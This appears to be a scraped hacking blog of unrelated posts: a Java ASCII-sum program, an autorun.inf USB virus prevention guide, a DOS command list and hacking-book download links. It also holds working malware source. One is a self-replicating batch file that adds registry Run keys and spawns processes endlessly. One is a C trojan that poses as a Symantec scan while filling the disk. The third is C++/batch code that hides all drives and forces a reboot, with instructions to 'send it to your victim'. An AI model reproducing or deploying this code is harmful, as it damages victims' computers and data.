Pages

Find ASCII Value of String


import java.util.*;

class sumasc
{
    public static void main(String args[])
    {
    String s;int sum=0,u;
           
    Scanner sc=new Scanner(System.in);
    System.out.println("enter a string");
    s=sc.next();
   
    for(int i=0;i<s.length();i++)
       {
        char x;
        x=s.charAt(i);
                      u=(int)(x);
             sum=sum+u;
        }
        System.out.println("sum of given string's ascii value==  "+sum);  
          }
}


Preventing your computer and laptop from monster of all viruses


Preventing your computer and laptop from monster of all viruses: 



Have you ever felt like infected by a virus which makes your pc run like Pentium ii with 32Mb of RAM or disables the Ctrt+Alt+Del option or “folder option” from tools menu.
 

To get rid of it you formatted your pc but system is infected in few hours of re-installation of windows then you are the victim of most common virus which infects the pc and mainly transferred by removable storage device like pen drive, USB Hard drive and memory cards.
 

More then 50% of pc I have repaired are

Tip: Never open any pen drive or memory card by double clicking always it may be infected by autorun virus.

infected of this kind of virus and the rest of pc have a costly antivirus installed on it which is regurly updated or some of them dose not use removable storage devise

I will guide you through how to protect your system having Windows XP or Windows 2003 from this type of virus without any antivirus just by few precaution

The Attack strategy

The possibility of getting a CD infected by virus is very less coz the program that control the writing of a CD or DVD can not modified to write virus files on disk may be coz there are many type of different CD\DVD writing software available nower days.

Before understanding the attack strategy of virus we must understand what they really are, the virus are program which are developed by programmer to harm a computer system.
But as it is a program it has a limitation that it cannot run automatically it has to be activated for infecting a system.

So mostly new virus mainly uses two attacking strategy

1) Activation by double clicking
And
2) Activation using autorun feature of CD\DVD

Clicking technique
 

The programmer gives the virus program a common icon or an attractive icon so the user accidentally clicks on the icon and the devil is activated to attack the system.

The common icon used by virus is the icon of an folder coz when the virus has an icon of an folder it is hard to differentiate between the virus and the normal folder and some times in search of some files we accidentally activates the virus some time it has names like “New folder” which is common in windows and some times it has programmed to obtain the name of the folder in which is stays like if a memory card or pen drive have a folder name data the if the system is infected by this type of virus then an virus is created in the data directory named as New folder.exe and having icon of folder but in normal computer the common extension are hidden by the system so the virus named New folder.exe appears to be an folder without an extension and if your system is infected by this type of virus it will disable the option from which enable the user to see extension of all files on the system.




Other most conmen icon for virus is of MS Excl and appears as office.xsl, currie user try to open the file but nothings happens but now the vius is activated so you cannot delete the file coz if we try to delete it then it is recreated itself actually the full file name of this virus is office.xls.exe

The virus may be in many different icons too like icon of a media file or VLC player etc


Autorun Method

Every computer user is familiar with CD\DVD which have an icon and automatically starts installing itself when double clicked like CD of any Microsoft OS, MS office or any game disc etc.
 

This type of disc uses a file name autorun.inf for this type of work which can be opened using Notepad. This file can be used to give any icon to drive or to decide which program will execute when drive is double clicked.

The content of autorun.inf is usually


This is the good side of autorun feature but now we will understand the dark side of it.
 

Imagine what if the command of executing the virus is written on the autorun file. Then every time we double click on the drive the virus is executed. This is what happens with our loved pen drive and memory card.

Every time when an infected pen drive or card is connected with a non infected system and opened by double clicking the autorun file present in the root directory of the pen drive activates the virus which is in hidden format.

Now the attack starts

ü The virus copies it self to the root of every drive along with the autorun file.
ü It copy itself to system folders
ü Add it self to registry
ü Disable the Registry editor
ü Disables the method of viewing hidden files
ü Disables the Task manager which appears when we click Ctrl+Alt+Del
ü Enable him self to run on startup
 

<![if !supportLists]>ü <![endif]>Disable the MSCONFIG Option which can be used to remove virus from startup
<![if !supportLists]>ü <![endif]>Some times the virus also block some web sites like orkut

Depending on virus some of above tasks are not perform but most of them are common for every such type of virus

Now your pc is infected so every removable drive connected to your system will be infected automatically and ready to infect another system.

Symptoms


Now the question is how you will know that your pc is infected
Just follow few procedure to know your system is infected or not
 

1) Try to hit Ctrl+Alt+Del and see if the task manager is opening or not
*if task manager not opening then the system is infected.
2) Go to My Computer and check if the folder option is there on the tools menu or not
*if folder option is not visible then the system is infected
3) If you cannot view the hidden files even enabling the option from “tools>folder option>view>show hidden files folder “
4) Go to Start>Run and type “MSCONFIG” and “REGEDIT” 

Check if both the program is running or not, one by one.
*If MSCONFIG or REGEDIT is not running the system is infected
5) Open Notepad and go to file menu and click on open and go to root directory of any drive and in file name type autorun.inf and click on open, if any file is open then your pc may be infected

If your computer is infected with virus you have to install a new antivirus with latest update or you have to go through a painful and time consuming formatting process

Tip: I will recommend Avast Antivirus 4.8 Home antivirus it is free to download and can be updated regularly for free.

Precautions

If your computer is not infected by virus you can take few precautions to prevent your pc from being infected
1) The God of all precautions, never use any Removable storage device.
2) In tools>folder option>view

- click “Show hidden files and folders”
-remove the tick mark form “hide extension for known file type” and “hide protected operating system files”
 

(Removing the tick mark form “hide extension for known file type” will enable the extension i.e. .exe format so the virus having fake icon can be distinguished and deleted. The autorun.inf is a system file so removing the tick mark form “hide protected operating system files” will make it visible to delete)





3) Never open any pen drive or memory card by double clicking always it may be infected by autorun virus.

>open the drive by right clicking on it and selecting explorer
Or
>go to Start>Run and enter the drive name and press OK


Or
>in my computer click on the address bar dropdown arrow and click on your pen drive



These three methods will bypass the autorun.inf file

If autorun.inf is present then open it and check the command search the command “open=”

Like



This will give you the name of virus which is in the pen drive, in this example the virus name “1weicxa.com”

Few common virus name is Smss.exe, N1detct.exe, d.com, 1weicxa.com etc some of the virus also have the extension of .bat or .com

After that you have to delete the autorun.inf and related virus file too.
4) While opening pen drive if you find any folder icon with .exe extension delete it immediately
5) For precaution you can search the removable drive for any unknown exe file and com or bat files

Just before searching go to searching option>advance option and tick on “search system folders”,”search hidden files and folders” and “search subfolders”

Search for *.exe,*.com and *.bat

6) Never open any unknown file on pen drive which is not copied to pen drive by you or your friend.
Formatting Your Infected System

Finally if you are screwed up with virus problem and decide to format the pc then follow few of my instruction other wise your pc may be infected again after few minutes of re-installation

If you are formatting whole hard drive then it is ok but if you are only formatting the c: drive then when the installation is over do not open any of other drive by double clicking on it because it may spread the autorun virus again to your pc just go to my computer in tools>folder option>view

- click “Show hidden files and folders”

-remove the tick mark form “hide extension for known file type” and “hide protected operating system files”

Now
>open the remaining other drives by right clicking on it and selecting explorer
Or
>go to Start>Run and enter the drive name and press OK
Or
>in my computer click on the address bar dropdown arrow and click on your drive (i.e. d: or e:)

This three methods will bypass the autorun.inf file

If autorun.inf is present then open it and check the command search the command “open=”
Like
“open=virus.exe”
This will give you the name of virus which is in the pen drive, in this example the virus name “virus.exe”


Then delete both the files from all other drives


Now you have to search the other drives for virus having folder icon so search the other drives(except c:) for all *.exe files(Just before searching go to searching option>advance option and tick on “search system folders”, ”search hidden files and folders” and “search subfolders”)

Now arrange all exe by size and see if there are any exe with folder icon if your computer was infected with such type of virus then you will find many files having folder icon this all exe will have same size so they will be grouped together and can be easy to delete

Now after these two tests are complete you can use your pc normally and can protect your pc from pen drive virus by just precaution without any antivirus.

Tips
Hear is a cool tip for protecting your pen drive and memory card from virus of your friends computer
1) Find a cool icon for your pen drive (like in example we are taking icon name “icon_name.ico”)
2) Create a txt file and name it autorun.inf


it will look like this
Type the command in it




And save it to the root directory of removable drive along with the icon file.




This will create a cool icon for your pen drive or memory card and if you use your pen drive on friends computer which is infected with autorun virus then it will over write the autorun.inf created by you and the icon will then be disappeared and you will directly come to know that your pen drive is infected or not this trick will also work on other drives like c: or d:



Simple Batch File Virus


Here's another simple batch file virus





It creates a reg file and puts it in the registry
then it creates a file in C:\ called 2.bat
the 2.bat file copys itself into other files and opens them
each file does the same 2.bat but they EACH loop
so it keeps on opening other batches that each loop and open other batches
the only way out is to boot in safe mode.
I tried this one a couple comps and on one of them it wasnt very effective and it only opened a limited amount of files and im not sure why because i was able to crt+alt+del which i wasnt able to do on the other comps which were all winblows xp. there will be 1600 processes opening about 1600 other processes opening up another 1600 processes and so on looping on each of them
------------------------------------------------------------------------------------------------------------
@echo off
del C:\1.reg
>>"C:\1.reg" ECHO winblows Registry Editor Version 5.00
>>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\winblows\Cur rentVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\winblows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\winblows\\2.bat"
>>"C:\1.reg" ECHO "autoexec"="c:\\winblows\\3.bat"
regedit.exe /s C:\1.reg

>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\winblows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\winblows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\winblows\3.bat
>>"C:\2.bat" ECHO start C:\winblows\1.bat
>>"C:\2.bat" ECHO start C:\winblows\2.bat
>>"C:\2.bat" ECHO start C:\winblows\3.bat
>>"C:\2.bat" ECHO goto 1
------------------------------------------------------------------------------------------------------------
start 2.bat
del C:\1.reg
------------------------------------------------------------------------------------------------------------


SPACE EATER


SPACE EATER TROJAN. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!







#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;
void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);
void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}
void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");
if((choice=getch())!=13)
exit(0);
}
void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}
void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}
void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}


Autorun.inf virus attack


Autorun.inf  Virus  ?

When i  studied second year(cse), my friends told that autorun.inf is virus.  I thought so.  Because my antivirus blocks autorun.inf files.   In third year when i search about autorun.inf file in net, i realize about the auto run file.

 Today i bring some files from my college system.  When i insert the pen drive in my system, there are lot of exe files.They are viruses.  I delete all of them.  Finally i opened the autorun.inf file in notepad and saw the instructions.  Then only i remembered that i forget to post about autorun file.  This article will give you complete details about the autorun.inf file.

This is the instructions that saved in the infected(call virus programs) autorun.inf file:

---------------------------------------------------------------------------------------------------------------

[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

---------------------------------------------------------------------------------------------------------------

is autorun.inf virus file?  no.  Then why antivirus block the autorun.inf files?  Go ahead to know the full details about auto run file.

Introduction to Autorun.inf File:
Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted.  Simpy triggers.

When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file).

How to create Autorun file?
Open notepad
type this command:
[Autorun]
save the file as "autorun.inf" (select all files, not text )

Complete Syntax and instructions inside the Autorun file:
Basic syntax must be inside  the autorun.inf file is :
[Autorun]
This will be used to identify the the file as autorun.

OPEN=
This will specify which application should be opened when the cd or pen drive is opened

Example:
open=virus.exe
This will launch the virus.exe file when cd or pen drive is opened.  The file should be in root directory.
if the file is in any other sub directories ,then we have to specify it.
Open=RECYCLER\Virus.exe
Explore=
Nothing big difference. if you right click and select explore option in cd or pen drive.  This command will be run.

AutoPlay=
Same as the above , but it will launch the the program when auto played.


SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:


shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe



Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=
Change the icon of your pen drive or cd.  you can use .ico,.bmp images(also .exe,.dll)

Example:
icon=breakthesecurity.ico
Label=

Specifies a text label to displayed for this CD in Explorer
Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:



Label=Ethical hacking


Why Antivirus Block Autorun.inf file?
From above ,you come to know that autorun.inf file is not virus.  But why antivirus blocks it?  Because as i told autorun file call or launch any application or exe files.  It will lead to virus attack.  If the autorun.inf is blocked,then there is no way to launch the virus code.

Autorun is not virus but it can call virus files.

Shows the amount of traffic on the network



netstat -a



We know that  typeing netstat -a in command prompt will shows the amount of traffic on the network.
Currports is a light weight and portable application which lists all the open ports and remote connections with

Process Name
Process ID
Protocol
Local port
Local Address
Remote Port
Remote Address
Remote Host Name
Process path
Process Services etc.



The good thing is that you get detailed information about all the web traffic, to which programs traffic is bound to, the current open ports, protocol (TCP/UDP) etc. If you suspect any unusual network activity, you can close unwanted TCP connections and kill the process that opened the ports. It supports IPv6 ports and can generate reports in HTML and XML file formats for debugging.




 

C++ ,Batch Virus Code To Disable All Hard Disk




C++ ,Batch Virus Code To Disable All Hard Disk



Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.


C++ Virus Code :
---------------------------------------------------------------------------------------------------------------
#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }


--------------------------------------------------------------------------------------------------------------
Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp


Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.
------------------------------------------------------------------------------------------------------------
Batch Virus Code Creation:
------------------------------------------------------------------------------------------------------------
EG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

-------------------------------------------------------------------------------------------------------------
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim




DOS Command




ALL DOS COMMAND



ADDUSERSHelps Add or list users to/from a CSV file
ARPAddress Resolution Protocol
ASSOCChange file extension associations
ASSOCIATOne step file association
ATSchedule a command to run at a later time
ATTRIBChange file attributes
BOOTCFGEdit Windows boot settings
BROWSTATGet domain, browser and PDC info
CACLSChange file permissions
CALLCall one batch program from another
CDChange Directory - move to a specific Folder
CHANGEChange Terminal Server Session properties
CHKDSKCheck Disk - check and repair disk problems
CHKNTFSCheck the NTFS file system
CHOICEAccept keyboard input to a batch file
CIPHEREncrypt or Decrypt files/folders *
CleanMgrAutomated cleanup of Temp files, recycle bin
CLEARMEMClear memory leaks
CLIPCopy STDIN to the Windows clipboard.
CLSClear the screen
CLUSTERWindows Clustering
CMDStart a new CMD shell
COLORChange colors of the CMD window
COMPCompare the contents of two files or sets of files
COMPACTCompress files or folders on an NTFS partition
COMPRESSCompress individual files on an NTFS partition
CON2PRTConnect or disconnect a Printer
CONVERTConvert a FAT drive to NTFS.
COPYCopy one or more files to another location
CSVDEImport or Export Active Directory data
DATEDisplay or set the date
DcomcnfgDCOM Configuration Utility
DEFRAGDefragment hard drive
DELDelete one or more files
DELPROFDelete NT user profiles
DELTREEDelete a folder and all subfolders
DevConDevice Manager Command Line Utility
DIRDisplay a list of files and folders
DIRUSEDisplay disk usage
DISKCOMPCompare the contents of two floppy disks
DISKCOPYCopy the contents of one floppy disk to another
DNSSTATDNS Statistics
DOSKEYEdit command line, recall commands, and create macros
DSADDAdd user (computer, group..) to active directory
DSQUERYList items in active directory
DSMODModify user (computer, group..) in active directory
ECHODisplay message on screen
ENDLOCALEnd localisation of environment changes in a batch file
ERASEDelete one or more files
EXITQuit the CMD shell
EXPANDUncompress files
EXTRACTUncompress CAB files
FCCompare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Loop command: all options Files, Directory, List
FORFILESBatch process multiple files
FORMAT Format a disk
FREEDISKCheck free disk space (in bytes)
FSUTILFile and Volume utilities
FTPFile Transfer Protocol
FTYPEDisplay or modify file types used in file extension associations
GLOBALDisplay membership of global groups
GOTODirect a batch program to jump to a labelled line
HELPOnline Help
HFNETCHKNetwork Security Hotfix Checker
IFConditionally perform a command
IFMEMBERIs the current user in an NT Workgroup
IPCONFIGConfigure IP
KILLRemove a program from memory
LABELEdit a disk label
LOCALDisplay membership of local groups
LOGEVENTWrite text to the NT event viewer.
LOGOFFLog a user off
LOGTIMELog the date and time in a file
MEMDisplay memory usage
MD Create new folders
MODEConfigure a system device
MOREDisplay output, one screen at a time
MOUNTVOLManage a volume mount point
MOVEMove files from one folder to another
MOVEUSERMove a user from one domain to another
MSGSend a message
MSIEXECMicrosoft Windows Installer
MSINFOWindows NT diagnostics
MSTSCTerminal Server Connection (Remote Desktop Protocol)
MUNGEFind and Replace text within file(s)
MVCopy in-use files
NETManage network resources
NETDOMDomain Manager
NETSHConfigure network protocols
NETSVCCommand-line Service Controller
NBTSTATDisplay networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUPName server lookup
NTBACKUPBackup folders to tape
NTRIGHTSEdit user account rights
PATHDisplay or set a search path for executable files
PATHPINGTrace route plus network latency and packet loss
PAUSESuspend processing of a batch file and display a message
PERMSShow permissions for a user
PERFMONPerformance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINTPrint a text file
PRNCNFGDisplay, configure or rename a printer
PRNMNGRAdd, delete, list printers set the default printer
PROMPTChange the command prompt
PsExecExecute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOnWho’s logged on (locally or via resource sharing)
PsLogListEvent log records
PsPasswdChange account password
PsService View and control services
PsShutdownShutdown or reboot a computer
PsSuspendSuspend processes
PUSHDSave and then change the current directory
QGREPSearch file(s) for lines that match a given pattern.
RASDIALManage RAS connections
RASPHONE Manage RAS connections
RECOVERRecover a damaged file from a defective disk.
REGRead, Set or Delete registry keys and values
REGEDITImport or export registry settings
REGSVR32Register or unregister a DLL
REGINIChange Registry Permissions
REMRecord comments (remarks) in a batch file
RENRename a file or files.
REPLACEReplace or update one file with another
RDDelete folder(s)
RDISKCreate a Recovery Disk
RMTSHAREShare a folder or a printer
ROBOCOPYRobust File and Folder Copy
ROUTEManipulate network routing tables
RUNASExecute a program under a different user account
RUNDLL32Run a DLL command (add/remove print connections)
SCService Control
SCHTASKSCreate or Edit Scheduled Tasks
SCLISTDisplay NT Services
ScriptItControl GUI applications
SETDisplay, set, or remove environment variables
SETLOCALControl the visibility of environment variables
SETXSet environment variables permanently
SHAREList or edit a file share or print share
SHIFTShift the position of replaceable parameters in a batch file
SHORTCUTCreate a windows shortcut (.LNK file)
SHOWGRPSList the NT Workgroups a user has joined
SHOWMBRSList the Users who are members of a Workgroup
SHUTDOWNShutdown the computer
SLEEP Wait for x seconds
SOONSchedule a command to run in the near future
SORTSort input
STARTStart a separate window to run a specified program or command
SUSwitch User
SUBINACLEdit file and folder Permissions, Ownership and Domain
SUBSTAssociate a path with a drive letter
SYSTEMINFOList system configuration
TASKLISTList running applications and services
TIMEDisplay or set the system time
TIMEOUTDelay processing of a batch file
TITLESet the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPEDisplay the contents of a text file
USRSTATList domain usernames and last login
VER Display version information
VERIFY Verify that files have been saved
VOLDisplay a disk label
WHERELocate and display files in a directory tree
WHOAMIOutput the current UserName and domain
WINDIFFCompare the contents of two files or sets of files
WINMSDWindows system diagnostics
WINMSDPWindows system diagnostics II
WMICWMI Commands
XCACLSChange file permissions
XCOPYCopy files and folders


Firewalls And Networks How To Hack Into Remote Computers


Download Book




Firewalls And Networks How To Hack Into Remote Computers   Download

Hacker HighSchool

Download Book


Being_a_Hacker                     Download
Windows_and_LinuxDownload
Ports_and_ProtocolsDownload
Services_and_ConnectionsDownload
System_IdentificationDownload
MalwareDownload
Attack_AnalysisDownload
ForensicsDownload
Email_SecurityDownload
Web_Security_and_PrivacyDownload
PasswordsDownload
Legalities_and_EthicsDownload
TOC_GlossaryDownload

SECRETS OF A SUPER HACKER

Download  Book




Name          SECRETS OF A SUPER HACKER
AutherDennis Fiery
PublicationBy The Knightmare
FilePdf
Size1.88 Pdf
DownloadSECRETS OF A SUPER HACKER.pdf

Hacking Gmail

Download Book

Name                 Hacking Gmail          
AutherBen Hammersley
PublicationWiley Publishing, Inc.
FilePdf
Size6.01 MB
DownloadHacking Gmail.pdf

HACKING EXPOSED WEB APPLICATIONS

Download Book

NameHacking Exposed Web Application
AutherJOEL SCAMBRAY & MIKE SHEMA
PublicationMcGraw-Hil
FilePdf
Size7.60 MB
DownloadHacking Exposed Web Application.pdf

Hack Attacks Testing

Download Book




Name                 Hack Attacks Testing
AutherJohn Chirillo
PublicationWiley Publishing,Inc
FilePdf
Size9.56 MB
DownloadHack Attacks Testing.pdf

HACKER DICTIONARY


Download Book


Name            Hacker Dicitionary
AutherBernadette Schell and Clemens Martin
PublicationWiley Publishing, Inc
File Pdf
Size4.93
DownloadHacker Dicitionary.pdf